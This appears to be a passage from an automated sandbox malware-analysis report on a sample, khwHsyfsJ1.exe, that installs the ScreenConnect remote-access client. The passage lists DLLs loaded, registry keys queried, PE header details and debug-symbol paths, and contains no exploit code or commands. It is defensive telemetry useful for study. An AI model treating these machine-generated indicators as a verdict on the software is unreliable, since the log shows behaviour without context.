                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: khwHsyfsJ1.exeStatic PE information: certificate valid
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: khwHsyfsJ1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: khwHsyfsJ1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EDAA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1831129892.00000000012A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: khwHsyfsJ1.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EBFC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F0EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1829272446.0000000005532000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890524416.0000000002FA0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1890789904.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1825684879.0000000000FED000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2474748099.000001D43EDD7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43EF44000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2474748099.000001D43F136000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1832507878.000000001BD62000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
